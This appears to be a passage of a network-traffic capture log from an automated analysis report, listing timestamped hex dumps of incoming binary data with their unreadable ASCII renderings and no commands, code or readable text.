                                                                                                                                                    2022-09-29 12:59:25 UTC36507INData Raw: e0 b1 3f ba c5 a3 9f 47 54 83 45 ac 70 ba a4 83 51 fd fb d8 c5 3f 38 41 5e da 4f 02 7f 81 a4 05 de 9b 59 21 0d 8b 61 a7 8f 05 6e af 93 ba 32 f3 2b 51 e3 76 36 ab 58 9c ed c6 72 75 23 81 9b 14 18 70 5f d2 70 47 2d 0b b9 d1 89 c2 4d d8 b3 e6 e8 32 c6 85 4b 92 1b f6 3f 4b ad 41 83 5a 1f 6e 60 fa d8 68 0b 30 3a bd b2 3c 6d f3 c1 1b 7f 10 1f db 65 ba 21 f9 67 8f 3b fc 3b fa 7a 8f 51 93 34 b2 28 b9 4d cf c3 fc 73 6a 8d 72 02 42 e1 5c 13 d1 e4 6b 66 2e 67 cb 58 20 e4 f6 67 3f 0e 35 e8 02 4f 66 52 4d 80 3b 15 df 89 af fc 77 65 67 f5 65 4d 82 c1 75 af aa 64 a5 30 20 28 d7 82 7e c3 ed 1b d1 19 0e 5f 9d c0 1e c6 39 45 52 bd 25 d6 4f b5 de 21 4e 91 2f 47 46 21 79 ca 09 72 e8 db c1 63 12 7a 9f e0 7c 7a 40 7d 42 87 bf af f6 2f 74 65 03 81 25 c9 97 6f c5 2f f3 0c a2 38
                                                                                                                                                    Data Ascii: ?GTEpQ?8A^OY!an2+Qv6Xru#p_pG-M2K?KAZn`h0:<me!g;;zQ4(MsjrB\kf.gX g?5OfRM;wegeMud0 (~_9ER%O!N/GF!yrcz|z@}B/te%o/8
                                                                                                                                                    2022-09-29 12:59:25 UTC36523INData Raw: ea 27 3b e1 ef 70 1e ae 83 2d 66 6e a2 1b 21 3f 83 65 e4 79 f8 bd dd 16 15 84 bb d7 f8 3d 20 58 a6 fb fa 9a 4a 60 89 46 71 7c 4a a5 69 c1 af bc 2f 27 77 87 d9 33 9b da 0f c9 3d a5 68 e5 34 a7 d1 58 d8 0a 92 48 6b c8 ba 5e 50 b4 06 5a c4 d6 e8 3d 52 45 9a c5 60 06 5a 1f 9a d9 df 08 d5 78 29 e5 b0 e8 e8 2f b1 1c 12 db 9d db ed de ad 9f 98 41 62 b3 ba f3 6b 55 80 5c 80 18 34 27 6b 5d 11 b2 d1 a7 7d 12 f2 e3 04 d1 6f a0 91 54 b3 35 4f 64 c5 dd c3 90 ac e6 98 01 8d 8a 81 0c 31 97 c2 fc e6 90 b2 b2 e0 13 5c 3d 83 d0 e1 db 54 c1 5f a1 a7 43 56 20 8f c6 f7 a1 26 b1 d7 36 67 da ae 29 bc 0d 8b d2 a3 00 cb 68 ea c4 27 8a 75 5c a0 7d 26 86 70 ef c8 ab 5f 39 bc 8c 8b 9a 6c b3 38 0d f9 86 f7 85 bf 50 71 b8 dd 8a 7f 02 0c 87 b2 77 eb ad a0 6a 1c ef 78 9f 4c 38 12 4d ca
                                                                                                                                                    Data Ascii: ';p-fn!?ey= XJ`Fq|Ji/'w3=h4XHk^PZ=RE`Zx)/AbkU\4'k]}oT5Od1\=T_CV &6g)h'u\}&p_9l8PqwjxL8M
                                                                                                                                                    2022-09-29 12:59:25 UTC36539INData Raw: 12 16 8f fa d5 5f 8c e1 74 b0 8b 5d 1d bd 32 93 69 76 be 55 22 15 50 67 e8 fe 95 37 bb fe cf 0d 8c 9b c6 04 f6 9b d5 96 b8 31 a8 9c 69 a8 49 26 6a 77 37 b6 78 1f 54 12 28 26 53 0c 2c 5b cd 97 02 a4 f8 ce 21 41 9e af a5 1e 72 a5 03 f4 19 6e 29 3d 77 ee 3a 9c 31 cd 36 90 e8 4b 80 d8 61 50 38 ec 4a 15 09 40 06 a4 6e 48 0c b0 d6 1e ab 8b 29 40 45 76 5c 8e df 4e f4 71 57 17 30 08 7d c7 b7 b0 67 23 a6 ee 27 a6 8d 4d 1b f7 68 90 0f b0 e4 05 a9 e4 ce 3e 7b 75 b8 62 a0 5b 5b 45 2a 62 84 5a 07 8a 60 f1 52 f7 f8 2c 8a b3 28 e7 d4 80 9f d3 2d 39 19 12 16 13 4a 4d b7 07 25 1f ae 73 91 21 e0 98 ae f2 43 b2 0f 0a 3c 8b e2 2b 8b 91 65 b9 c1 0c b0 fc f9 7f eb 45 42 95 20 9b 82 5a b9 45 f2 78 3c 05 ba 41 28 d1 6f ed f8 c5 a2 42 4d a2 05 dc fb 6c 92 cb 56 73 04 e2 92 77 a2
                                                                                                                                                    Data Ascii: _t]2ivU"Pg71iI&jw7xT(&S,[!Arn)=w:16KaP8J@nH)@Ev\NqW0}g#'Mh>{ub[[E*bZ`R,(-9JM%s!C<+eEB ZEx<A(oBMlVsw
                                                                                                                                                    2022-09-29 12:59:25 UTC36555INData Raw: 35 67 58 8a 8d fe d6 e9 b7 9c da a3 74 90 bb bc 35 be 96 35 9f 53 cb d7 52 02 0d 0e 2f e8 88 4d 07 b2 70 f4 03 0b d9 af 5b 9d d3 70 04 78 7b d6 98 61 76 c8 be 57 97 ad a2 34 5f c9 f8 fc 55 f0 7b 0f 39 b0 d6 a8 16 fe 98 d5 ef cb c1 29 94 43 11 46 50 64 6d 23 66 6e 90 4f e7 2d f0 a1 81 f5 b5 29 40 dd 41 64 90 94 76 66 d0 16 9d bb 4c 64 fa 8e 67 35 04 2a 1e eb 2b d9 8b d6 51 33 b2 a9 34 5a 43 70 00 ee 9f 61 43 30 ef 3d bf fa cd f8 6b 65 21 dd e2 e3 2e fe 6b 4e bd 66 2e e4 58 6f 71 f5 8f e4 fb 5d 7b b8 09 75 56 8b c6 90 09 3c 6a 82 c9 a5 ac ab ea 14 93 0e ea 97 34 dd ef 8e 04 1b 57 0f 4a 93 29 7d 18 9e 35 48 e2 f0 b6 a5 f0 66 9d 88 d0 c6 b4 6f cb a7 31 fd 84 fa 23 de 4b 52 e2 42 a7 96 40 1a 96 ff 91 a6 86 1e b3 8f 0f ef b9 52 68 3d 3d 1c 8b e5 3f 84 1e f0 7c
                                                                                                                                                    Data Ascii: 5gXt55SR/Mp[px{avW4_U{9)CFPdm#fnO-)@AdvfLdg5*+Q34ZCpaC0=ke!.kNf.Xoq]{uV<j4WJ)}5Hfo1#KRB@Rh==?|
                                                                                                                                                    2022-09-29 12:59:25 UTC36571INData Raw: 84 78 c6 b5 ca 71 6e 16 85 d3 64 4a fe d6 fa b0 9f fc 72 67 b0 d9 cd 25 97 9c bb 81 f2 e2 c8 2c 9e dc b3 de 1d 0e 15 7e e9 c6 e5 33 be 5f 53 b9 60 72 6a f8 9d 16 8d f7 19 a8 d8 58 bb 5c f4 d0 97 42 d9 0f 3d 0f b4 28 82 e7 3e 33 6d 58 17 15 1d 91 e9 8e 7b 7c e6 1a 1f 9e 78 5c ca f6 3b db b4 a6 c1 11 43 08 cb 91 2d e2 8e c7 8b 95 f6 0c ca 7b ae c4 49 bf ac 88 9c ad 25 a0 f6 8b b4 58 bc 83 72 96 1e f8 c2 25 24 7e 6a f4 3d 5d 7f 41 66 d8 40 74 2f c8 b3 c2 43 ee 47 fb e8 44 26 dc c2 65 2e 0d fe c8 5c a5 81 2c c8 63 3c 00 a1 86 60 f3 65 bb 44 d0 67 f4 7e b2 8d c4 f0 19 4b a5 3e bb bc 76 86 60 ee 1e 38 91 ab 75 3a 75 98 7a e1 76 ef ea c8 91 93 94 7f de 50 fd 84 fa 7c 83 9a db 29 c5 a9 54 35 89 f2 a9 69 ad 7b 83 09 50 db 77 7c 9c f2 50 bd ea d1 6b 53 86 28 5b ab
                                                                                                                                                    Data Ascii: xqndJrg%,~3_S`rjX\B=(>3mX{|x\;C-{I%Xr%$~j=]Af@t/CGD&e.\,c<`eDg~K>v`8u:uzvP|)T5i{Pw|PkS([
                                                                                                                                                    2022-09-29 12:59:25 UTC36587INData Raw: 75 9b fc 11 c1 83 f3 f4 5a 78 92 3c 1f b0 36 d2 8f 20 09 b9 8e 88 87 b4 40 ac 57 47 85 7d 10 ed 3f c9 bf e5 f0 f8 a7 1d 32 b2 73 a2 08 85 f1 33 3e e1 55 04 6f d9 b4 bd 26 08 c3 f8 e4 95 60 07 d0 f3 04 30 5e 6e 50 d7 c4 6a d2 e4 c4 18 31 f6 30 6b 7d f4 98 4b f4 b9 06 62 f6 ba 21 68 8b 1d 96 a7 1e 8e fe 90 06 c4 c5 e0 a4 64 97 78 8e 50 69 d6 5c 10 4a b5 0e 5f 42 b5 ed 75 28 d9 c8 de 48 64 1f 52 5a c7 e9 22 5f 2f 7a 2d b7 51 b5 d1 a1 f5 57 5e e7 bb af 50 83 a9 3d b0 84 eb c7 9c fa 73 f4 04 4a ef 89 cd fe ad 0a 2a f3 32 f1 49 67 9e 5d 82 11 21 92 61 94 ad 8b cc 07 41 e0 07 f2 dc 20 fd 6c 8b de 16 2c 80 12 32 37 3c a2 81 1e c7 93 a6 f2 73 93 8f a5 ca ed 3f 29 46 8c ef 39 a8 e9 db fc 0d 7b 82 55 e7 99 9e 96 32 d1 5c 02 bc 7c 63 f4 09 b7 11 30 07 09 73 dd 70 28
                                                                                                                                                    Data Ascii: uZx<6 @WG}?2s3>Uo&`0^nPj10k}Kb!hdxPi\J_Bu(HdRZ"_/z-QW^P=sJ*2Ig]!aA l,27<s?)F9{U2\|c0sp(
                                                                                                                                                    2022-09-29 12:59:25 UTC36603INData Raw: 38 00 28 a7 4e f1 08 f8 87 83 91 4e c1 5c 38 ea 16 be 8b cb de c0 30 8b 80 15 99 d5 57 93 9f d9 f1 1d ce 52 d0 f9 92 c1 a2 9f 5c df c8 03 54 22 66 c2 bc 0d 82 81 c3 ec 7b ed ee ab 40 22 4d f2 5a 05 a2 54 2a 2f bb 53 4e 49 02 fd 3d f1 91 8f 8a 66 ea 6e 0d c4 4e 7e 50 6a a1 ac 52 c3 86 73 58 76 89 28 73 9e 92 03 e4 b9 8b 7a ca 10 98 81 5b dc 2c f2 ca 48 c3 d9 6d 0f d9 aa 46 59 6c e1 d2 47 b3 b5 ad 41 74 58 1e 97 4b 20 d6 4b 06 f3 88 e3 6d 53 0d 7d 92 38 da 36 83 d6 73 0c a0 76 33 c3 84 4c 30 6b 5d b0 c2 89 da 74 82 14 b5 4a d1 2a 7e d6 35 0f 57 94 b8 2b fd 22 04 86 14 8f f4 73 87 55 dc ff 8b c7 d3 52 23 be 52 90 d4 dc 41 52 04 63 62 ab 8d 0b c2 cf 78 13 5a 17 c5 6e a2 18 af 35 31 2b a9 43 69 61 a4 7c df 6d 26 42 2c 27 5a 25 5a 0f 41 3f 74 19 f6 99 6d d5 00
                                                                                                                                                    Data Ascii: 8(NN\80WR\T"f{@"MZT*/SNI=fnN~PjRsXv(sz[,HmFYlGAtXK KmS}86sv3L0k]tJ*~5W+"sUR#RARcbxZn51+Cia|m&B,'Z%ZA?tm
                                                                                                                                                    2022-09-29 12:59:25 UTC36619INData Raw: b6 37 6f 96 d3 56 3a 39 d5 cf e0 ce 90 6d 82 60 2f 81 30 80 fb 87 de c2 da 18 be 38 9f d6 ee 97 b0 8e b5 3c c5 ef 96 ae e9 12 8c 36 f6 d7 f5 c5 64 4c f9 9e 46 16 cd 8c 8d f2 1f cc 23 43 c9 37 34 17 00 0b ae c8 10 3a 3d 14 d7 2f 22 82 66 8d 0e 9a 19 1d a1 c7 b5 6e 6e 8f 45 0c d6 c7 21 fd bc c3 39 37 02 4a 5b 14 3d 03 dc 3a a3 ad b4 d4 13 cb fb d2 1c da 4d 62 3d 36 1d 97 1c 56 26 79 13 29 fd 25 30 33 19 6a cd 11 39 1b 5b 7f f7 10 8d 81 66 f8 f8 7c 33 54 fd 2a 59 39 6c b3 20 f8 3f c5 8e 89 49 50 b6 ed ad 45 0a b9 ea bf d1 85 07 a4 3e ab 3a a5 5c 00 ee 8d c9 9a b4 cf 95 bb 93 d5 da ab a9 80 b7 27 e4 f6 1b ca 6e fb 29 de ce 51 ca 59 12 03 d6 dc bb 87 b5 3f 6c 60 f7 7b 82 c1 c3 a6 ec 45 0a 03 e4 41 b0 23 21 47 70 0b f3 c6 58 a5 ab 83 f6 cf 1e b9 a3 00 6d a4 da
                                                                                                                                                    Data Ascii: 7oV:9m`/08<6dLF#C74:=/"fnnE!97J[=:Mb=6V&y)%03j9[f|3T*Y9l ?IPE>:\'n)QY?l`{EA#!GpXm
                                                                                                                                                    2022-09-29 12:59:25 UTC36635INData Raw: 13 1a 8e e9 96 4e 0c 13 a6 3f 5b be b3 87 ca 94 3c 6f 5d 60 4b 15 a2 10 39 27 6b eb c6 ee 15 a0 95 98 6c 1c f0 b1 a9 49 96 13 87 62 1a 11 55 89 c2 65 c0 72 9f 1a 6f 91 9d 84 c1 4e b4 0c ee 29 d4 f0 3c fb 55 63 eb a2 2e 60 72 a3 35 b6 d1 0e cc 94 1b 75 1e 99 72 1e b7 fb 3b 54 df 46 bd 67 dc d1 8b 11 40 78 1b 8c a9 12 43 ec 9a 41 c8 bf 83 d2 fd 1f 1c 5b 9d ad 23 a7 4c 52 09 8f 30 98 57 db 1b 64 af 71 d3 8f e7 c1 5d 30 52 97 fb 8a a6 e6 f0 3a da 04 0a d0 61 ce 49 32 18 82 eb 86 78 94 9f 8a f3 b6 f6 8b 55 26 16 bf 9a ea 45 ec 76 d2 ae e3 37 b1 e4 02 b5 1a e4 e9 69 4d e0 f0 90 4e c5 89 d6 1c a3 fb dd f7 43 c4 8c a5 95 d0 39 9c 61 93 6c 1e 8d cf 42 53 09 55 fa 3f dc ad 7f 45 1c c5 37 67 04 21 31 53 53 12 85 52 80 aa 24 db 8a ba c2 43 c9 bb 50 39 95 29 45 2c b7
                                                                                                                                                    Data Ascii: N?[<o]`K9'klIbUeroN)<Uc.`r5ur;TFg@xCA[#LR0Wdq]0R:aI2xU&Ev7iMNC9alBSU?E7g!1SSR$CP9)E,
                                                                                                                                                    2022-09-29 12:59:25 UTC36651INData Raw: 84 9d 4f c5 60 aa 94 b7 2b 78 79 a1 c1 f8 ac 98 69 68 a5 6f cd 88 1f 88 aa d1 1f df c8 55 50 18 6f 0e ae 9d 36 cf 2a 75 a8 a6 de 1d 31 2e bc 49 30 83 a4 78 a1 dc ed 0b 48 5f 5d ab 01 86 3a f9 f9 e6 db 00 81 3d df 3b 80 a6 62 c4 95 8c 90 c2 c9 3c 77 3c d3 59 a2 6d 10 d2 80 c5 3b 5a 23 ee 2f 57 f1 31 1d 4b d1 29 01 94 1e ea 97 f8 88 96 92 26 6a f4 5a c2 a6 8b 3f 9a e2 e8 87 13 ce 76 e5 9a e7 5a ce a3 49 e3 74 30 57 9c a2 f4 8f a3 71 0e 10 6c 33 72 70 fe 09 9c c1 21 e4 b7 47 73 ed a0 5c 34 66 6d e4 ab 27 45 e9 3a e2 34 ae 9c 97 f4 35 44 b6 2a 61 ef 44 53 3c 7e cd 24 b9 05 30 82 79 20 32 ff 02 32 3f 7a 8a c5 76 eb 76 72 b3 c4 85 ca d9 ee f8 2f 03 77 88 3b 4b 12 76 5e b0 59 1d 30 f4 2e 07 2b 53 ef 4f 9c e4 f5 80 af 96 1e ec 69 4e 36 9f ee 9e ea 7d 7b ed c6 be
                                                                                                                                                    Data Ascii: O`+xyihoUPo6*u1.I0xH_]:=;b<w<Ym;Z#/W1K)&jZ?vZIt0Wql3rp!Gs\4fm'E:45D*aDS<~$0y 22?zvvr/w;Kv^Y0.+SOiN6}{
                                                                                                                                                    2022-09-29 12:59:25 UTC36667INData Raw: 12 6e f0 55 d1 9f 4b e9 cb 69 ae 7d 38 97 f4 06 7a 95 ed 03 1d b4 d3 7e a5 20 b5 56 fe 68 b0 05 5f a5 5b 0e d5 22 18 3d b8 2d cf 9a 09 a0 48 3f 05 ae 2d 01 e8 b4 be 98 77 76 1e f4 97 79 92 a6 82 c2 ba c1 4b 99 28 74 13 9c 8f 66 75 25 56 23 88 60 36 cb 4a cc 4f 96 0c 1a 7d ab 6c 82 b9 f3 e8 ec 6e 63 7f 73 9a fc f3 54 f3 94 82 e0 56 3a 2c 85 bf 7f f1 e2 23 dd 63 9c 64 76 25 32 14 75 f3 b1 2f 99 d1 aa f8 46 cb 06 fa 9c 89 58 11 e9 74 4d bd ed 50 fd d2 41 69 36 03 02 c1 02 f0 4d 28 82 20 5a 5b cd 91 7e fe be b4 d5 06 4f 92 c0 ad db 5b 28 5f f2 6a db 48 00 20 99 f1 5d 34 97 c3 27 69 84 1a b9 95 36 c9 c2 c2 7a 0a a5 d8 e3 89 c5 ca c3 40 b8 7c 6f 62 24 69 fa 1c e3 90 cf 2d 66 a6 97 4b 85 03 0a f9 99 98 27 fc ef 0b 1c f9 f4 29 5f 91 00 d2 7b fa e1 0a 46 cd a8 18
                                                                                                                                                    Data Ascii: nUKi}8z~ Vh_["=-H?-wvyK(tfu%V#`6JO}lncsTV:,#cdv%2u/FXtMPAi6M( Z[~O[(_jH ]4'i6z@|ob$i-fK')_{F
                                                                                                                                                    2022-09-29 12:59:25 UTC36683INData Raw: f9 94 b4 b2 d1 11 ed 4d 69 7b fd 18 ce 47 4b 46 38 69 7c cf 31 22 d3 c0 4d 49 0c 3e 8f 2d e8 f2 86 65 f9 15 b0 52 59 cd 06 12 aa dd 9a 7f 2d b2 1a 55 ce a9 6d ae 54 1a cb 58 44 6e 2e 84 c8 ac cf 1f 27 bb 3e 78 19 62 4d 9e d8 92 a2 15 4c 66 5c a4 13 0c ac b4 1b a4 af 11 a1 ce fb a5 c6 60 2b 43 8e 4c 0f 04 12 93 e8 71 75 e5 09 b9 d7 9a f5 52 d8 7b a0 b4 85 a9 76 4d e5 1c 16 aa 0f 69 c5 fc 36 b1 1e 98 ff 5b a3 28 d3 48 34 e5 01 9c a5 6e a4 e2 5d 2f 3e 7e ab b3 3d ec ef c1 cc 4e b6 00 de e5 6d cb a6 17 78 ee 06 46 04 cc f1 69 fd c1 36 23 63 28 01 4f be 78 5b 75 f0 18 76 a7 da 22 93 cf f3 c1 bb dd a9 dc d7 2a ee 9a 00 74 2e ac 63 47 52 12 26 e7 ad 51 0e b7 57 fb ef d8 50 6b f2 1d 42 c2 c1 27 b6 c9 e6 ed a0 13 2d 9c 61 74 b6 18 e6 69 1f 81 c4 fe c3 84 dc ac 6e
                                                                                                                                                    Data Ascii: Mi{GKF8i|1"MI>-eRY-UmTXDn.'>xbMLf\`+CLquR{vMi6[(H4n]/>~=NmxFi6#c(Ox[uv"*t.cGR&QWPkB'-atin
                                                                                                                                                    2022-09-29 12:59:25 UTC36699INData Raw: 91 37 79 b9 f8 05 ae 0f 8c 90 a7 98 c9 68 4a b8 f0 a0 4c 45 f8 95 69 66 e4 96 7b 7f ad f8 02 09 0a 8b f8 a2 b6 e7 3c 45 93 e5 90 96 8a 10 b3 3d 0f 2c 0b 26 c7 66 11 bb 1b b6 7d e6 86 fb 9e 1b 06 27 e4 21 37 14 8c 99 82 2a dd b8 11 2d 2a 4a 5d 29 05 aa cb 30 17 fd 4b f5 b4 9c 81 bb e9 d2 1a d9 4e f8 26 48 e9 15 4f a5 a9 08 ef 26 10 9b f9 02 96 34 51 c3 0d 39 60 b8 23 dc 8e bc 1a 96 4c f3 0e c0 6c 59 64 d6 1c e9 09 1c a3 b0 c2 5f 80 55 d0 20 d8 60 aa f5 3d 99 32 01 dc 90 c1 a0 0a 53 92 d5 bd 10 14 b6 f2 3c 3e c7 30 0e 7b 39 4a b1 fe aa f1 8a 0a c3 9d 57 3a 18 ba 5e 40 60 39 0d 51 66 50 cc 35 07 85 91 96 4e 89 4c 2b 73 8a 95 94 81 ab 77 5e cf 07 05 45 60 3d 39 8f 74 f2 68 29 c1 5f 9e 56 db 6c f8 0b 46 5d f2 2c f9 a8 6b b7 b6 ca 6d 63 15 9c ca 57 0d 3b b0 e5
                                                                                                                                                    Data Ascii: 7yhJLEif{<E=,&f}'!7*-*J])0KN&HO&4Q9`#LlYd_U `=2S<>0{9JW:^@`9QfP5NL+sw^E`=9th)_VlF],kmcW;
                                                                                                                                                    2022-09-29 12:59:25 UTC36715INData Raw: f8 4d 7d df 06 87 b4 d3 da 22 13 35 da 76 5b fd 2e 60 aa 5d 65 8a fb 8a d3 8d 9a 49 ae c1 74 b1 26 84 13 07 50 1c 65 58 0c c8 1b 25 23 d2 89 1b cc c4 24 68 53 dd 70 a6 88 2a f6 5d f2 a2 ef c9 b6 d2 74 bc 45 9c 4b 5d 57 c4 3e fb 50 d9 a2 74 e8 5d 98 19 60 58 aa 81 5e 69 66 5c 2c ec e4 e8 87 a5 d9 d7 8e c0 ae 3c be 53 e5 e9 ff 5d c7 13 82 90 05 d8 89 ba 61 7a c7 90 cf c0 46 3e cb 08 f0 37 9d 5b 7b ac b4 9e 1e e8 87 94 ac a6 dd ab b3 d9 f3 ca e8 90 21 9b 47 8e 60 d5 f7 3d 82 60 16 3a e1 e1 32 19 9f 67 81 9a 1d 66 ce 59 2a 2c 39 ef 6e 58 ca 54 c9 4e 85 67 7b 1e b2 42 9f f3 b2 85 08 b4 cc 0a a9 54 c8 47 2d 4b 6a 7c 63 04 27 7a 42 f3 f4 06 7f c6 6d 02 71 d1 ed 54 6c 23 c3 79 be ff a7 bc 00 37 80 58 bb 02 6f 56 12 3d e2 9e 08 43 b3 ca 02 04 4e a9 27 c5 0d 84 2a
                                                                                                                                                    Data Ascii: M}"5v[.`]eIt&PeX%#$hSp*]tEK]W>Pt]`X^if\,<S]azF>7[{!G`=`:2gfY*,9nXTNg{BTG-Kj|c'zBmqTl#y7XoV=CN'*
                                                                                                                                                    2022-09-29 12:59:25 UTC36731INData Raw: 4b c9 cd d1 49 28 91 d3 30 2e 12 00 ab 0d 8b 7b 50 38 a3 30 00 19 6f 72 e7 84 22 d4 a9 8d 69 16 a1 3a ae c7 bc 6a c9 a6 9b c1 1a 56 2a 50 73 93 58 a1 84 49 5a 95 7e 7e 1d 4e 04 15 c7 45 0f 7f 0b 0c 30 86 d4 c8 4d 75 1d f9 3b 53 a4 70 57 97 cb d5 6e 80 5f 7e dd 61 f8 3e 55 19 be b5 d5 16 6f 12 48 60 88 e5 e7 f2 51 12 2a 8d 0c f2 e3 ea 2f fb 90 68 f9 0b 1d 02 05 e6 a9 13 cc ea 7d 07 d1 ba fb 51 4b 61 6f 2a 90 9e 14 d9 2e 91 85 fc 20 08 7d 0f 00 3a 98 67 45 89 8f 29 9c c0 2a 5d 42 1f 6a bd 1c 71 f4 dc 83 eb 17 10 6c 89 3f 09 97 f8 17 19 40 bb c3 a2 66 b0 d9 0c c9 29 fe 79 55 5c 8f 0e 37 0e b5 c6 b9 16 5e 1c 54 37 4a 60 79 ae b8 86 8a 3e 4f b1 c8 60 0c 5a b4 53 4d cd b9 10 54 e8 59 ac 11 19 fe 58 59 11 70 83 22 3c e4 76 b1 76 bf 3a 59 53 8c b4 4d 2b 33 8c 1f
                                                                                                                                                    Data Ascii: KI(0.{P80or"i:jV*PsXIZ~~NE0Mu;SpWn_~a>UoH`Q*/h}QKao*. }:gE)*]Bjql?@f)yU\7^T7J`y>O`ZSMTYXYp"<vv:YSM+3
                                                                                                                                                    2022-09-29 12:59:25 UTC36747INData Raw: 0e 47 d6 d4 63 6d b7 55 40 ee ec a1 cb 59 52 30 a8 a7 43 30 6d 64 b7 e5 72 ad 45 31 9e ab e2 4f 5b 53 86 d2 bb 40 12 f9 9b ab e0 dd 02 77 a5 7f 9d 0a cd ea 77 16 87 8b f2 32 d3 41 58 f2 25 f0 4c e5 9b 52 9d df 6f 9f c7 e5 62 38 4a e1 b2 b5 73 6b fe ca c7 b7 b5 ef 35 ab 26 84 0d 72 da 06 13 c9 93 2b f3 28 54 9c 0c 19 88 69 6e 42 12 80 ec 37 cc d6 5c 4d 5e 17 91 ba c2 67 52 91 58 c5 95 14 49 d8 80 7b 04 ea c2 47 5d bb ed bc 65 5a 61 cf 45 3b f9 eb 4b e9 95 64 4b d8 09 8f c8 a0 7d 59 3b 5e 3a f0 98 11 c0 ee ad b2 4e 7a 37 26 ad 50 99 a1 cb 24 62 df 5a 81 47 f8 ff 30 42 94 9d 11 d2 4a 54 4a 17 48 ae 39 96 72 a4 eb 77 8c 43 35 44 02 f4 73 2b 57 cf 25 94 8e 20 ed c6 a7 c6 fa cf 5a a3 ed b3 6b a5 0a e7 7c be 0b 38 89 8c da e1 8d 6b 4a 14 6d 19 8c 0d f1 62 8e 63
                                                                                                                                                    Data Ascii: GcmU@YR0C0mdrE1O[S@ww2AX%LRob8Jsk5&r+(TinB7\M^gRXI{G]eZaE;KdK}Y;^:Nz7&P$bZG0BJTJH9rwC5Ds+W% Zk|8kJmbc
                                                                                                                                                    2022-09-29 12:59:25 UTC36763INData Raw: b2 f4 6a 35 11 19 9e 84 c7 12 fd f7 f9 77 f4 3d 2c 9b 40 62 21 05 a4 fc 84 0e 04 0a 57 d5 20 30 c8 a1 38 67 ea 9b 8a c1 44 2b c1 dc fe f9 50 77 50 21 55 36 1a 75 bf 0c ec b3 03 84 c3 55 51 0b 20 fd da 31 47 9e 59 f8 6b 54 b3 e2 e4 53 0c 17 ef fc 71 fc 8d 04 ba 44 fb bc 83 31 cd 0e 7a 2f 87 97 e8 e4 75 f7 c7 3b 41 c6 cb b1 9d d0 63 7c 9f 11 d4 0d d5 28 4c 1f 4a e2 f5 6e 5c 76 87 5e 9b 88 9f 4f 10 3d d2 68 54 af 3d 21 c9 c8 c8 80 d6 94 4c 25 6c 46 e1 d0 c1 5f 2f d6 fc 05 3e 17 99 41 46 0e fd 72 d6 f5 0b 51 a2 0e 42 db 94 dc fe 60 b8 bd a0 fc 56 c1 db 8c 09 87 c3 19 91 5d 0a 3b cb 3c b2 a3 63 23 36 2c 87 47 fa e3 4c 98 d3 4c 97 02 2d 8f e7 d6 aa d5 69 49 f8 90 e5 30 19 c7 3d 42 6d 13 b1 8e 8d de cb 0c 1c a1 ed 43 e2 5f d0 e8 c3 e9 71 10 56 c6 c6 d1 93 22 eb
                                                                                                                                                    Data Ascii: j5w=,@b!W 08gD+PwP!U6uUQ 1GYkTSqD1z/u;Ac|(LJn\v^O=hT=!L%lF_/>AFrQB`V];<c#6,GLL-iI0=BmC_qV"
                                                                                                                                                    2022-09-29 12:59:25 UTC36779INData Raw: 7f 5c 9f 5c f5 77 cd 7e 52 ac b7 12 8c ab 00 6c 1b 66 2b 7e f0 d0 9d 97 95 c7 88 9b 1d 7f a7 d2 92 c7 aa 5e f8 a1 d4 80 f6 ef 40 11 7c 9d f2 2e 36 43 19 a4 ed 1d 84 40 50 8e 56 15 c6 23 f5 03 2c 01 07 a1 07 5d 1a 29 84 6c 0a c8 01 6e 80 24 35 c1 b9 51 cb a9 71 69 6e c4 ed ff 48 bc 2e 71 52 69 cd 6f ac 58 9c 18 63 83 49 b5 c1 e9 4a f5 c2 5e 67 89 ea de 5d 0f fe cc f5 08 a0 ae e9 50 4a 78 d1 f4 9b b6 d9 be 95 3b e2 d5 ff 48 74 57 11 d5 54 f1 7f 49 80 c6 2c 01 79 81 5c 38 7b 79 79 8e 4f 98 f2 4c aa f1 ae 47 b8 6a f1 d8 03 67 24 e0 b2 67 a1 0d a2 b8 5b 01 56 e3 19 96 47 e4 22 3a af d8 93 9c 33 ce b3 c8 37 a7 39 9c 48 64 65 42 21 3a 41 3a 84 b9 08 10 61 41 44 8e 29 55 98 ff ca 35 4a d0 d0 9d 58 16 0a 25 24 3a 3f c0 92 9d 24 50 a7 40 40 eb f1 02 5c fe 6a 19 2c
                                                                                                                                                    Data Ascii: \\w~Rlf+~^@|.6C@PV#,])ln$5QqinH.qRioXcIJ^g]PJx;HtWTI,y\8{yyOLGjg$g[VG":379HdeB!:A:aAD)U5JX%$:?$P@@\j,
                                                                                                                                                    2022-09-29 12:59:25 UTC36795INData Raw: 7a ef 27 0e a1 3b a1 e0 c8 66 81 cf a0 08 74 84 66 55 3c 97 04 7e 2a 48 ad 1c cd 2d cb 0f 9f 14 50 fa 57 2d 2b a3 d5 95 87 bd 18 c7 d7 33 c6 9e 8d 93 a9 66 3d 36 a3 57 8a e5 77 67 97 c8 7f c7 f9 21 ac cd c9 dd d1 ce 80 08 a9 fe e3 59 50 34 4b d6 c0 d6 38 a7 97 02 d5 d9 a3 46 29 60 e5 07 a3 e9 85 16 19 57 fa 28 81 ef 42 50 b7 1c e9 2c a3 7c 74 5f 64 8d d1 f8 c7 77 c1 11 a8 92 12 85 b6 c3 60 83 b7 63 e4 40 91 eb b2 97 e2 f8 e9 f0 21 dc a3 98 3d 0a 61 c1 aa 1c a7 1f b6 e7 f6 33 cf b7 e8 19 23 21 73 51 99 e2 94 3b eb 6d f2 da b1 3c ea 8f 95 a7 f9 49 a9 4e 11 5c 61 01 b3 8e 6d 58 79 b7 46 da 5f 20 db 1e c5 cc b8 10 59 9d 4f 06 40 d5 ea 94 91 88 88 d9 77 0f 63 c6 ec 2a a6 d2 54 2e 27 5f bb 27 2e 84 b2 60 92 ca f3 05 9c b0 64 b7 7a cb 19 69 80 ec 96 c0 2f 8c 2c
                                                                                                                                                    Data Ascii: z';ftfU<~*H-PW-+3f=6Wwg!YP4K8F)`W(BP,|t_dw`c@!=a3#!sQ;m<IN\amXyF_ YO@wc*T.'_'.`dzi/,
